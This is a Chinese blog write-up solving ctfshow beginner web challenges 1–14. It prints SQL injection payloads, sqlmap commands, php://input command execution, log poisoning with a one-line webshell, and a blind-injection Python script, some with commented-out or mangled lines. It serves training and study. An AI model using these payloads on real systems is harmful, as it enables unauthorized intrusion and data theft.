ctfshow web1-14 萌新赛wp

最新推荐文章于 2024-08-27 02:27:00 发布
最新推荐文章于 2024-08-27 02:27:00 发布
阅读量531 收藏 13
点赞数 6
文章标签: 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56546651/article/details/139426616
版权

WEB 1

F12查看源代码,发现一串base64

直接解码获得flag

ctfshow{c6111612-f415-4de3-b17a-4eb6113db4ea}

WEB 2

第一种解法

尝试常见的弱口令admin/admin/admin123等无反应

使用万能密码拿到回显

# 账号输入,密码为空
1' or 1=1 #

# 使用order by 测出行数为3
1' or 1=1 order by 3#

# 发现回显为2
1' or 1=1 union select 1,2,3#

# 库名为web2
1' or 1=1 union select 1,database(),3#

# 爆破表名为flag,user
1' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database();#

# 爆破字段
1' or '1'='1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'#

# 爆破flag
1' or '1'='1' union select 1,group_concat(flag),3 from flag#
第二种解法

输入账号密码进行抓包,

将抓包到的内容保存至1.txt

使用sqlmap跑结果

sudo sqlmap -r 1.txt --dbs --batch

sudo sqlmap -r 1.txt -D web2 --tables --batch

sudo sqlmap -r 1.txt -D web2 -T flag --columns --batch

sudo sqlmap -r 1.txt -D web2 -T flag --dump --batch

WEB 3

根据题目可使用伪协议

https://xxx/?url=php://input

抓包后在重发器可输入php代码

<?php system("ls");?> # 发现ctf_go_go_go

<?php system("cat ctf_go_go_go");?> # 爆破flag

WEB 4

尝试伪协议报错

?url=/var/log/nginx/access.log # 查看nginx日志成功

抓包在User-Agent写入一句话木马

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

使用蚁剑连接后门获得flag

WEB 5

代码检查v1是否为字母,v2是否为数字

如果v1和v2的md5相等则输出flag

百度相同的md5传入获得flag

WEB 6

经过测试发现题目过滤了空格,使用/**/绕过空格,其余与WEB 2解法相同

WEB 7

经过测试,同样仅过滤了空格,同WEB 2

WEB 8

经过测试,发现过滤很多,学习借鉴别的师傅写出的python脚本试试

import requests

url = 'https://c3dbda6f-8655-422c-b7d3-77a7cc2ed3f3.challenge.ctf.show/index.php?id=-1/**/or/**'
name = ''

for i in range(1,45):
    #获取数据库
    #payload = 'ascii(substr(database()from/**/%d/**/for/**/1))=%d'

    #获取表名
    #payload = 'ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%d/**/for/**/1))=%d'

    #获取字段名
    #payload = 'ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name="flag")from/**/%d/**/for/**/1))=%d'

    #获取flag
    #payload = 'ascii(substr((select/**/group_concat(flag)/**/from/**/flag)from/**/%d/**/for/**/1))=%d'
    
    count = 0
    print('正在爆破第%d位'%i)

    for j in range(31,128):
        result = requests.get(url+payload%(i,j))

        if 'If' in result.text:
            name += chr(j)
            print("当前爆破结果为:"+name)
            break

        count += 1
        if count >= (128-31):
            print('爆破失败')
            exit(0)

WEB 9

手工尝试SQL注入未果,抓包保存为txt丢给sqlmap同样未果

进行目录爆破,发现robots.txt

打开robots.txt发现index.phps

打开后下载出一段代码




<?php
        $flag="";
		$password=$_POST['password'];
		if(strlen($password)>10){
			die("password error");
		}
		$sql="select * from user where username ='admin' and password ='".md5($password,true)."'";
		$result=mysqli_query($con,$sql);
			if(mysqli_num_rows($result)>0){
					while($row=mysqli_fetch_assoc($result)){
						 echo "登陆成功<br>";
						 echo $flag;
					 }
			}
    ?>

在多次尝试未果后翻看了别的师傅的wp,

ffifdyop 的MD5加密结果是 276f722736c95d99e921722cf9ed621c

经过MySQL编码后会变成’or’6xxx,使SQL恒成立,相当于万能密码,可以绕过md5()函数的加密

输如ffifdyop获得flag

WEB 10

这题不会做

观看网上的wp知道

username=admin’//or//1=1//group//by//password//with/**/rollup#&password=

WEB 11

根据源代码可知,只需password与session相等即可

直接抓包将sesssion改为空即可

web 12

F12查看源代码发现注入关键词为cmd

phpinfo(); # 有回显证明有注入漏洞

print_r(glob('*')); # 发现有两个文件

highlight_file('xxx.php'); # 高亮函数打开php获得flag

web 13

不会

web14

一个个试到3弹出登录界面

尝试sqlmap未果

查看源代码发现过滤

-1/**/or/**/true # 寻找注入点
-1/**/or/**/flase
-1/**/or/**/true/**/order/**/by/**/2 # 出错
-1/**/or/**/true/**/order/**/by/**/1 # 正确

-1/**/union/**/select/**/1
-1/**/union/**/select/**/database() # 爆库名

-1/**/union/**/select/**/group_concat(table_name)/**/from/**/information_schema.`tables`/**/where/**/table_schema='web' # 爆表名

-1/**/union/**/select/**/group_concat(column_name)/**/from/**/information_schema.`columns`/**/where/**/table_name='content' # 爆字段无反应

看wp发现不知道为什么没回显,回显在源代码里

-1/**/union/**/select/**/group_concat(id,username,password)/**/from/**/content # 爆数据

1adminflag is not here!,2gtf1ywow,you can really dance,3Wowtell you a secret,secret has a secret…

-1/**/union/**/select/**/load_file('/real_flag_is_here')

给她

根据题目暗示,应该是git泄露

目录爆破
sudo dirb http://xxx # 找到xxx/.git

使用githack下载源代码
sudo python2 GitHack.py https://xxx/.git

查看出现

<? php
$pass=sprintf("and pass='%s'",addslashes($_GET['pass']));
$sql=sprintf("select * from user where name='%s' $pass",addslashes($_GET['name']));
?>

获得注入点,尝试注入发现报错

查看wp

抓包发现file里有一串16进制

解码为flag.txt

改为file:/flag

获得flag

签到题

爆破目录发现/flag

直接下载获得flag

玛卡巴卡的大推车
关注
ctfshow-WEB-萌新-wp
F1rstb100d
09-03 631
ctfshow-WEB-萌新-wp
ctfshow-web入门-信息搜集wp
m0_53567065的博客
10-31 648
ctfshow-web入门-信息收集wp
ctfshow-web萌新(详解)
m0_63641882的博客
11-06 382
1.addslashes函数+sping的漏洞2.cookie的盗用3.代码审计+正则过滤。
CTFShow-WEB入门篇文件上传详细Wp(151-170)_ctfshow文件上传wp
最新发布
2401_86043950的博客
08-27 736
【代码】CTFShow-WEB入门篇文件上传详细Wp(151-170)_ctfshow文件上传wp
CTFShow-Web篇详细wp(持续更新中ing)
Aluxian_的博客
04-23 1278
【代码】CTFShow-Web篇详细wp
ctfshow 萌新 web部分
weixin_74427106的博客
12-09 135
目已经提示了有两个页面,一个是register.php,一个是login.php去访问这两个页面,访问之后一个是注册页面,一个是登录页面,在注册页面用admin发现注册不成功,用admin+空格发现能够注册成功了,在用admin和你注册的密码进行登录发现能够登录成功,登录之后,我们在回过头开始分析代码,一个最重要的代码就是。addslashes会将'这个字符进行转义,而转义之后就构成了%1$\' or 1=1 --+这个w和小写的W把全部字符都给过滤了,这就利用一个新的姿势,就是用不输入进行过滤。
CTFShow-Web篇详细wp(持续更新中ing)_ctfshow web wp
2401_84254343的博客
04-26 386
又是这个熟悉的框 老样子尝试万能密码 发现报错!
ctfshow-Web入门-58~74wp
yutianovo的博客
09-24 1123
Web58-65 POST c=include($_GET['url']); GET /?url=php://filter/read=convert.base64-encode/resource=flag.php Web66-70 flag 换位置了 /flag.txt Payload还可以用 Web71 import requests url = "http://c5e8824e-b5b4-4842-8d39-bbcb78eb7976.chall.ctf.show/" d = {'c': 'i
ctfshow-WEB-未分类-wp
F1rstb100d
09-16 267
ctfshow-WEB-未分类-wp
ctfshow-web入门-爆破wp
m0_53567065的博客
11-01 1111
ctfshow-web入门-爆破wp
ctfshow-萌新-web14( 曲线救国-POST请求绕过获取网站敏感信息)
热门推荐
wangyuxiang946的博客
09-12 1万+
ctf.show萌新模块 web14关, 此关卡是一个代码执行漏洞, 重点在于命令执行函数的利用方式, 源码中过滤比较严格, 尤其是过滤了分号;之后, 虽然可以用?>来代替分号, 但这样一来就只能执行一行代码, 难度较大, 需要注意的是, 源码中的过滤只针对GET请求的参数, 而未对POST请求的参数做限制, 这里推荐曲线救国,GET请求传递一句话木马, 然后在POST请求中传递参数执行系统命令, 从而获取 flag 来到页面后展示了部分源码, 并提示 flag 就在 config....
CTF show萌新系列
12-22
目地址:https://ctf.show 0X01 萌新_密码1 1.16进制转字符串 有很多网站可以实现,这里我也附上我的脚本: # author: 羽 def hex_to_str(): while True: s = input("输入要转成字符串的16进制(输入空字符串退出):") if s=='': break k='' try: for i in range(0,len(s),2): j = s[i]+s[i+1]
ctfshow萌新经验总结
m0_62422842的博客
06-05 1820
涉及到的相关知识: sql注入中的sprintf格式化字符串漏洞。 基于约束的sql注入攻击。 利用Burpsuite Fuzz实现sql注入
CTFShow:萌新web1
weixin_64089259的博客
04-14 1026
第一次做web1目,刚开始一脸懵逼,看了大佬的一些博客,才做出来,心里非常激动!
ctfshow 萌xin
weixin_63231007的博客
04-25 1545
萌新 给她 git源码泄露.得到源码为 <?php $pass=sprintf("and pass='%s'",addslashes($_GET['pass'])); $sql=sprintf("select * from user where name='%s' $pass",addslashes($_GET['name'])); ?> 查看别人解,里写了有关sprintf函数的作用漏洞。从WordPress SQLi谈PHP格式化字符串问(2017.11.01更新)
ctf.show萌新_web1
人若无名,便可专心练剑
04-28 267
id=100 or id=1000//就是用一个id小于999的来进行验证,然后再给他一个1000的值进行判断。得到flag:ctfshow{10d957e0-b365-4483-bc47-ec076c86ac64}web2 :相同的原理,直接为?,所以两次操作就会变为原来的数字。,是在这个数字加一的基础上进行。
ctfshow_WEB_web2 wp
Altering_Ji的博客
04-23 573
ctfshow WEBweb2,最简单的SQL注入,writeup
[ctfshow内部]web wp
cosmoslin的博客
12-03 7916
签到 F12,有register.php import requests import re url1 = "http://7fc1279d-6a4b-4fca-968f-235322686f5b.challenge.ctf.show/register.php" url2 = "http://7fc1279d-6a4b-4fca-968f-235322686f5b.challenge.ctf.show/login.php" flag = '' for i in range(1, 50): payl
CTFSHOW萌新web14
weixin_44833249的博客
07-08 244
反引号(``)相当于shell-exec 用于执行系统命令。相比于上一过滤了括号, 可以尝试用反引号``执行命令。>是为了闭合PHP,当然也可以。这里也可以用文件包含绕过。
CTF挑战:WP1-ctfshow解攻略
"WP1-ctfshow" 这篇文章主要介绍了CTF(Capture The Flag)比中的若干种解技巧,特别是针对网络安全Web安全领域的一些基本技术。CTF比通常涉及网络安全、逆向工程、密码学等多个领域,而这里的讨论集中在...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

玛卡巴卡的大推车

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值